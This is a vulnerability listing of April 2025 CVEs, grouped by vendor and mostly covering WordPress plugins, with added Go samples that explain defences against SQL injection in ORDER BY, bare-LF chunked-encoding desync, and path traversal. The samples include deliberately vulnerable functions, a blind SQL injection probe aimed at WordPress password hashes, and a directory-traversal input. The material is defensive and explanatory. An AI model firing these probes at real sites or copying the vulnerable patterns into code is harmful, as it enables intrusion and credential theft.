| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31388 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in doa The World the-world allows Stored XSS. This issue affects The World: from n/a through <= 0.4. |
Dolby_uk · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31021 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dolby_uk Mobile Smart mobile-smart allows Reflected XSS. This issue affects Mobile Smart: from n/a through <= v1.3.16. |
Eazyplugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32542 | High | 8.8 | — | 2025-04-11 | Missing Authorization vulnerability in EazyPlugins Eazy Plugin Manager plugins-on-steroids allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Eazy Plugin Manager: from n/a through <= 4.3.0. |
Edamam · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32555 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Edamam SEO, Nutrition and Print for Recipes by Edamam seo-nutrition-and-print-for-recipes-by-edamam allows Stored XSS. This issue affects SEO, Nutrition and Print for Recipes by Edamam: fro… |
Element-hq · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32026 | Low | 3.8 | — | 2025-04-08 | Element Web is a Matrix web client built using the Matrix React SDK. |
Elementor · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32640 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Elementor Ally pojo-accessibility allows Stored XSS. This issue affects Ally: from n/a through <= 3.1.0. |
Eliot Akira · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32492 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eliot Akira Admin Menu Post List admin-menu-post-list allows Stored XSS. This issue affects Admin Menu Post List: from n/a through <= 2.0… |
Elpix · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3432 | Medium | 6.4 | — | 2025-04-08 | The AAWP Obfuscator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data-aawp-web' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. |
Embeds For Youtube Plugin Support · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31008 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Embeds For YouTube Plugin Support YouTube Embed youtube-embed allows Stored XSS. This issue affects YouTube Embed: from n/a through <= 5.3… |
Empik · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32568 | Critical | 9.8 | — | 2025-04-11 | Deserialization of Untrusted Data vulnerability in empik EmpikPlace for Woocommerce empik-for-woocommerce allows Object Injection. This issue affects EmpikPlace for Woocommerce: from n/a through <= 1.4.3. |
Epeken · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32673 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in epeken Epeken All Kurir epeken-all-kurir allows Stored XSS. This issue affects Epeken All Kurir: from n/a through <= 2.0.6. |
Eset, Spol. S R.o. · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-11859 | — | — | — | 2025-04-07 | DLL Search Order Hijacking vulnerability potentially allowed an attacker with administrator privileges to load a malicious dynamic-link library and execute its code. |
Essential Marketer · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31038 | High | 8.8 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Essential Marketer Essential Breadcrumbs essential-breadcrumbs allows Privilege Escalation. This issue affects Essential Breadcrumbs: from n/a through <= 1.1.1. |
Exthemes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31040 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Exthemes WP Food ordering and Restaurant Menu wp-food allows PHP Local File Inclusion. This issue affects WP Food order… |
Eyale-vc · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32199 | Medium | 6.5 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in eyale-vc Contact Form Builder by vcita contact-form-with-a-meeting-scheduler-by-vcita allows DOM-Based XSS. This issue affects Contact For… |
Fcj Venture Builder · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3405 | Medium | 4.3 | — | 2025-04-08 | A vulnerability was found in FCJ Venture Builder appclientefiel 3.0.27. |
Feedify · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-13874 | High | 7.1 | — | 2025-04-10 | The Feedify WordPress plugin before 2.4.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. |
Felixker · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-8243 | Medium | 6.3 | — | 2025-04-09 | The WordPress/Plugin Upgrade Time Out Plugin WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads… |
Flothemesplugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32213 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in flothemesplugins Flo Forms flo-forms allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Flo Forms: from n/a through <= 1.0.43. |
Flowiseai · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29189 | High | 7.6 | — | 2025-04-09 | Flowise <= 2.2.3 is vulnerable to SQL Injection. |
Foliovision · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32610 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in FolioVision Foliopress WYSIWYG foliopress-wysiwyg allows Cross Site Request Forgery. This issue affects Foliopress WYSIWYG: from n/a through <= 2.6.18. |
Fooplugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32139 | Medium | 5.9 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FooPlugins FooBox Image Lightbox foobox-image-lightbox. This issue affects FooBox Image Lightbox: from n/a through <= 2.7.33. |
Foysal Imran · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32519 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Foysal Imran IDonate idonate allows PHP Local File Inclusion. This issue affects IDonate: from n/a through <= 2.1.18. |
Fraudlabspro · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32659 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in fraudlabspro FraudLabs Pro for WooCommerce fraudlabs-pro-for-woocommerce allows Stored XSS. This issue affects FraudLabs Pro for WooCommerce: from n/a through <= 2.22.8. |
Fromdoppler · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32667 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in fromdoppler Doppler Forms doppler-form allows Stored XSS. This issue affects Doppler Forms: from n/a through <= 2.5.1. |
Fusiondirectory · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32807 | Medium | 5.3 | — | 2025-04-11 | A path traversal vulnerability in FusionDirectory before 1.5 allows remote attackers to read arbitrary files on the host that end with .png (and .svg or .xpm for some configurations) via the icon parameter of a GET request to geticon.php. |
G5theme · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32672 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in g5theme Ultimate Bootstrap Elements for Elementor ultimate-bootstrap-elements-for-elementor allows PHP Local File Incl… |
Gdragon · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3436 | Medium | 6.5 | — | 2025-04-08 | The coreActivity: Activity Logging for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'order' and 'orderby' parameters in all versions up to, and including, 2.7 due to insufficient escaping on the user supplied param… |
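The coreActivity row above names the 'order' and 'orderby' parameters, a recurring SQL injection shape: identifiers cannot be bound as prepared-statement parameters, so an ORDER BY clause built from request values needs an allow-list rather than escaping. The query builder below is an added example written for this page, not the plugin's code; the table and column names are invented for illustration.

```go
package main

import (
	"fmt"
	"strings"
)

// vulnerableActivitySQL shows the pattern behind the row above: ORDER BY takes
// identifiers, which cannot be bound as query parameters, so the request values
// are concatenated straight into the statement. Deliberately vulnerable.
func vulnerableActivitySQL(orderBy, order string) string {
	return fmt.Sprintf("SELECT id, action, ts FROM activity ORDER BY %s %s", orderBy, order)
}

// sortColumns is the allow-list: request-facing sort keys mapped to the exact
// column expression that will be emitted. Nothing from the request reaches the SQL.
// (Table and column names are constructed for this example.)
var sortColumns = map[string]string{
	"id":     "id",
	"action": "action",
	"time":   "ts",
}

// safeActivitySQL only ever emits values taken from sortColumns and the two
// literal direction keywords; anything else is refused rather than "sanitised".
func safeActivitySQL(orderBy, order string) (string, error) {
	col, ok := sortColumns[strings.ToLower(orderBy)]
	if !ok {
		return "", fmt.Errorf("unknown sort column %q", orderBy)
	}
	var dir string
	switch strings.ToUpper(order) {
	case "", "ASC":
		dir = "ASC"
	case "DESC":
		dir = "DESC"
	default:
		return "", fmt.Errorf("invalid sort direction %q", order)
	}
	return fmt.Sprintf("SELECT id, action, ts FROM activity ORDER BY %s %s", col, dir), nil
}

func main() {
	// Constructed attacker input: a time-based blind probe placed in the orderby position.
	probe := "(SELECT IF(SUBSTRING(user_pass,1,1)='$',SLEEP(5),1) FROM wp_users LIMIT 1)"
	fmt.Println(vulnerableActivitySQL(probe, "ASC"))
	if _, err := safeActivitySQL(probe, "ASC"); err != nil {
		fmt.Println("rejected:", err)
	}
	q, _ := safeActivitySQL("time", "desc")
	fmt.Println(q)
}
```

WordPress ships sanitize_sql_orderby() for exactly this position, and $wpdb->prepare() on its own does not help because it binds values, not identifiers. The point of the map is that the emitted string is always one of the map's values: the request can choose a column but never contributes characters to the statement.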
George Sexton · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32597 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in George Sexton WordPress Events Calendar Plugin – connectDaily connect-daily-web-calendar allows Cross-Site Scripting (XSS). This issue affects WordPress Events Calendar Plugin – connectDail… |
Getcursor · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32018 | High | 8.0 | — | 2025-04-08 | Cursor is a code editor built for programming with AI. |
Go Standard Library · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22871 | Critical | 9.1 | — | 2025-04-08 | The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. |
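The Go standard library row above (CVE-2025-22871) describes a parser leniency rather than a memory bug: the chunk-size line of an HTTP/1.1 chunked body must end in CRLF, and a decoder that also accepts a bare LF can disagree with a stricter front end about where each chunk, and the body itself, ends. Two hops that land on different sides of that choice is the precondition for request smuggling. The decoder below is an added illustration written for this page, not Go's net/http code or its fix; the function names and the sample bodies are mine.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
	"io"
	"strconv"
)

// ErrBareLF is returned in strict mode when a line that must end in CRLF ends
// in a bare LF instead.
var ErrBareLF = errors.New("chunked: bare LF where CRLF is required")

// readLine returns the bytes before the next '\n' and the offset just past it.
func readLine(data []byte, pos int) (line []byte, next int, ok bool) {
	i := bytes.IndexByte(data[pos:], '\n')
	if i < 0 {
		return nil, pos, false
	}
	return data[pos : pos+i], pos + i + 1, true
}

// stripCR removes the '\r' that should precede the '\n'. In strict mode a
// missing '\r' is an error; in lenient mode the bare LF is accepted.
func stripCR(line []byte, strict bool) ([]byte, error) {
	if n := len(line); n > 0 && line[n-1] == '\r' {
		return line[:n-1], nil
	}
	if strict {
		return nil, ErrBareLF
	}
	return line, nil
}

// parseChunkSize parses "<hex-size>[;extension]" from a chunk-size line.
func parseChunkSize(line []byte, strict bool) (int, error) {
	line, err := stripCR(line, strict)
	if err != nil {
		return 0, err
	}
	if i := bytes.IndexByte(line, ';'); i >= 0 { // drop chunk extensions
		line = line[:i]
	}
	n, err := strconv.ParseUint(string(bytes.TrimSpace(line)), 16, 31)
	if err != nil {
		return 0, fmt.Errorf("chunked: bad chunk size %q", line)
	}
	return int(n), nil
}

// DecodeChunked decodes a chunked body and reports how many input bytes it
// consumed, so two decoders can be compared on where they think the body ends.
// Trailer fields are not supported; the last chunk must be followed by an empty line.
func DecodeChunked(body []byte, strict bool) (payload []byte, consumed int, err error) {
	pos := 0
	for {
		line, next, ok := readLine(body, pos)
		if !ok {
			return nil, pos, io.ErrUnexpectedEOF
		}
		size, err := parseChunkSize(line, strict)
		if err != nil {
			return nil, pos, err
		}
		pos = next
		if size == 0 {
			line, next, ok = readLine(body, pos)
			if !ok {
				return nil, pos, io.ErrUnexpectedEOF
			}
			rest, err := stripCR(line, strict)
			if err != nil {
				return nil, pos, err
			}
			if len(rest) != 0 {
				return nil, pos, errors.New("chunked: trailers not supported")
			}
			return payload, next, nil
		}
		if pos+size > len(body) {
			return nil, pos, io.ErrUnexpectedEOF
		}
		payload = append(payload, body[pos:pos+size]...)
		pos += size
		// Each chunk's data is itself followed by CRLF.
		line, next, ok = readLine(body, pos)
		if !ok {
			return nil, pos, io.ErrUnexpectedEOF
		}
		rest, err := stripCR(line, strict)
		if err != nil {
			return nil, pos, err
		}
		if len(rest) != 0 {
			return nil, pos, errors.New("chunked: chunk data not followed by CRLF")
		}
		pos = next
	}
}

func main() {
	// Constructed sample: a body whose chunk-size lines end in bare LF.
	bareLF := []byte("4\nWiki\n0\n\n")
	for _, strict := range []bool{false, true} {
		p, n, err := DecodeChunked(bareLF, strict)
		fmt.Printf("strict=%v payload=%q consumed=%d err=%v\n", strict, p, n, err)
	}
}
```

With strict=false the bare-LF body decodes to "Wiki" and consumes all ten bytes; with strict=true it fails at offset 0 with ErrBareLF. The practical check for a deployment is to send a body with bare-LF chunk-size lines through the proxy chain and confirm that every hop rejects it, since a chain in which one hop accepts and the next rejects is the desync an attacker needs.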
Grade Us, Inc. · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32680 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Grade Us, Inc. |
Graphicsmagick · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32460 | Medium | 4.0 | — | 2025-04-09 | GraphicsMagick before 8e56520 has a heap-based buffer over-read in ReadJXLImage in coders/jxl.c, related to an ImportViewPixelArea call. |
Graylog · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30373 | Medium | 6.5 | — | 2025-04-07 | Graylog is a free and open log management platform. |
Greenmoney · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2882 | Medium | 5.3 | — | 2025-04-08 | The GreenPay(tm) by Green.Money plugin for WordPress is vulnerable to Sensitive Information Exposure in versions between 3.0.0 and 3.0.9 through the publicly accessible phpinfo.php script. |
Gtlwpdev · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32547 | High | 8.2 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in gtlwpdev All push notification for WP all-push-notification allows Blind SQL Injection. This issue affects All push notification for WP: from n/a through <= 1.5.3. |
Guichaguri · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32020 | — | — | — | 2025-04-08 | The crud-query-parser library parses query parameters from HTTP requests and converts them to database queries. |
Hakeemnala · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32577 | Critical | 9.8 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in hakeemnala Build App Online build-app-online allows PHP Local File Inclusion. This issue affects Build App Online: from… |
Haproxy · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32464 | Medium | 6.8 | — | 2025-04-09 | HAProxy 2.2 through 3.1.6, in certain uncommon configurations, has a sample_conv_regsub heap-based buffer overflow because of mishandling of the replacement of multiple short patterns with a longer one. |
Hasthemes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2719 | Medium | 6.5 | — | 2025-04-10 | The Swatchly – WooCommerce Variation Swatches for Products (product attributes: Image swatch, Color swatches, Label swatches) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the… |
Haxtheweb · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32028 | Critical | 9.9 | — | 2025-04-08 | HAX CMS PHP allows you to manage your microsite universe with PHP backend. |
Hedgedoc · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32391 | Medium | 6.4 | — | 2025-04-10 | HedgeDoc is an open source, real-time, collaborative, markdown notes application. |
Hewlett Packard Enterprise · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27081 | Medium | 6.8 | — | 2025-04-10 | A security vulnerability in HPE NonStop OSM Service Connection Suite could be exploited to cause a local denial of service. |
Hiren Patel · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32645 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Hiren Patel Custom Posts Order custom-posts-order allows Stored XSS. This issue affects Custom Posts Order: from n/a through <= 4.4. |
Hivedigital · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32543 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hivedigital Canonical Attachments canonical-attachments allows Reflected XSS. This issue affects Canonical Attachments: from n/a through <… |
Hk · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32603 | Critical | 9.3 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in HK WP Online Users Stats wp-online-users-stats allows Blind SQL Injection. This issue affects WP Online Users Stats: from n/a through <= 1… |
Horvey · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29391 | High | 7.2 | — | 2025-04-09 | horvey Library-Manager v1.0 is vulnerable to SQL Injection in Admin/Controller/BookController.class.php. |
Hossainawlad · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32518 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in hossainawlad ALD Login Page ald-login-page allows Stored XSS. This issue affects ALD Login Page: from n/a through <= 1.1. |
Hossein · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31014 | High | 7.5 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Hossein Material Dashboard material-dashboard allows PHP Local File Inclusion. This issue affects Material Dashboard: f… |
Hugh Mungus · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27350 | High | 7.1 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hugh Mungus Vice Versa vice-versa allows Reflected XSS. This issue affects Vice Versa: from n/a through <= 2.2.3. |
Huseyin Berberoglu · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31028 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Huseyin Berberoglu WP Hide Categories wp-hide-categories allows Reflected XSS. This issue affects WP Hide Categories: from n/a through <=… |
Icyleaf · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31400 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in icyleaf WS Audio Player ws-audio-player allows Stored XSS. This issue affects WS Audio Player: from n/a through <= 1.1.8. |
Infosoftplugin · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32541 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in infosoftplugin WooCommerce Sales MIS Report woocommerce-mis-report allows Reflected XSS. This issue affects WooCommerce Sales MIS Report… |
Instawp · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2636 | High | 8.1 | — | 2025-04-11 | The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. |
Intelcaprep · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31385 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in intelcaprep Site Table of Contents site-table-of-contents allows Stored XSS. This issue affects Site Table of Contents: from n/a through <= 0.3. |
Ip2location · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32644 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in IP2Location IP2Location World Clock ip2location-world-clock allows Stored XSS. This issue affects IP2Location World Clock: from n/a through <= 1.1.9. |
Jaap Jansma · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32551 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jaap Jansma Connector to CiviCRM with CiviMcRestFace connector-civicrm-mcrestface allows Reflected XSS. This issue affects Connector to Ci… |
Jalios · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-0942 | High | 8.6 | — | 2025-04-07 | The DB chooser functionality in Jalios JPlatform 10 SP6 before 10.0.6 improperly neutralizes special elements used in an SQL command, which allows unauthenticated users to trigger SQL injection. |
Jan Boddez · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31009 | Medium | 5.4 | — | 2025-04-09 | Server-Side Request Forgery (SSRF) vulnerability in Jan Boddez IndieBlocks indieblocks allows Server Side Request Forgery. This issue affects IndieBlocks: from n/a through <= 0.13.1. |
Jerryhanjj · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29390 | High | 8.8 | — | 2025-04-09 | jerryhanjj ERP 1.0 is vulnerable to SQL Injection in the set_password function in application/controllers/home.php. |
Jgehrcke · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-13896 | Medium | 6.5 | — | 2025-04-10 | The WP-GeSHi-Highlight — rock-solid syntax highlighting for 259 languages WordPress plugin through 1.4.3 processes user-supplied input as a regular expression via the wp_geshi_filter_replace_code() function, which could lead to Regular Exp… |
Joey-zhou · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3382 | Medium | 6.3 | — | 2025-04-07 | A vulnerability has been found in joey-zhou xiaozhi-esp32-server-java up to a14fe8115842ee42ab5c7a51706b8a85db5200b7 and classified as critical. |
John James Jacoby · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31524 | High | 8.8 | — | 2025-04-10 | Incorrect Privilege Assignment vulnerability in John James Jacoby WP User Profiles wp-users-profiles allows Privilege Escalation. This issue affects WP User Profiles: from n/a through <= 2.6.2. |
John Weissberg · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32671 | High | 7.5 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in John Weissberg Print Science Designer print-science-designer allows Path Traversal. This issue affects Print Science Designer: from n/a through… |
Joomsky · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32627 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in JoomSky JS Job Manager js-jobs allows PHP Local File Inclusion. This issue affects JS Job Manager: from n/a through <=… |
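The FusionDirectory row earlier in this section (CVE-2025-32807, a .png suffix check on the icon parameter that does not confine the path), the Path Traversal rows and the PHP Local File Inclusion rows such as the JS Job Manager entry above share one defect: the request value is filtered on what it ends with or looks like, not on where it resolves. The resolver pair below is an added example written for this page and is not code from any of those projects; the root directory, the function names and the sample requests are constructed for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot is returned when the requested path does not stay under the root.
var ErrOutsideRoot = errors.New("path escapes the allowed directory")

// naiveIconPath reproduces the weak pattern: only the file extension is checked,
// so "../../../etc/secret.png" is accepted. Deliberately vulnerable.
func naiveIconPath(root, icon string) (string, error) {
	if !strings.HasSuffix(icon, ".png") {
		return "", errors.New("not a .png icon")
	}
	return filepath.Join(root, icon), nil
}

// safeIconPath confines the request to root before checking the extension:
// absolute paths and NUL bytes are rejected, the joined path is cleaned (which
// collapses ".." segments), and the result must still be relative to root.
func safeIconPath(root, icon string, allowedExt []string) (string, error) {
	root = filepath.Clean(root)
	if icon == "" || strings.ContainsRune(icon, 0) || filepath.IsAbs(icon) {
		return "", ErrOutsideRoot
	}
	full := filepath.Join(root, icon) // Join cleans the result
	rel, err := filepath.Rel(root, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	ext := strings.ToLower(filepath.Ext(full))
	for _, a := range allowedExt {
		if ext == a {
			return full, nil
		}
	}
	return "", fmt.Errorf("extension %q not allowed", ext)
}

func main() {
	root := "/srv/fd/icons" // constructed example root, not a real install path
	for _, icon := range []string{
		"themes/default/user.png",
		"../../../etc/secret.png",
		"/etc/passwd.png",
		"themes/default/user.svg",
	} {
		np, nerr := naiveIconPath(root, icon)
		sp, serr := safeIconPath(root, icon, []string{".png"})
		fmt.Printf("%-26s naive=%q (%v)  safe=%q (%v)\n", icon, np, nerr, sp, serr)
	}
}
```

The containment check is lexical, so a symlink under root that points outside it still escapes; when serving real files, resolve with filepath.EvalSymlinks (or serve through an fs.FS rooted at the directory) and apply the same Rel check to the resolved path. For include/require the stronger fix is to look the request value up in a fixed map of permitted template names rather than build a path from it at all; once the name is looked up instead of assembled, there is nothing left to traverse.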
Jordi Salord · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32477 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Jordi Salord WP-Easy Menu wp-easy-menu allows Stored XSS. This issue affects WP-Easy Menu: from n/a through <= 0.41. |
Jose Conti · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32503 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jose Conti Link Shield link-shield allows Stored XSS. This issue affects Link Shield: from n/a through <= 0.5.4. |
Josh Kohlbach · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32539 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Josh Kohlbach Store Exporter woocommerce-exporter allows Reflected XSS. This issue affects Store Exporter: from n/a through <= 2.7.4. |
Kailey (Trepmal) · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
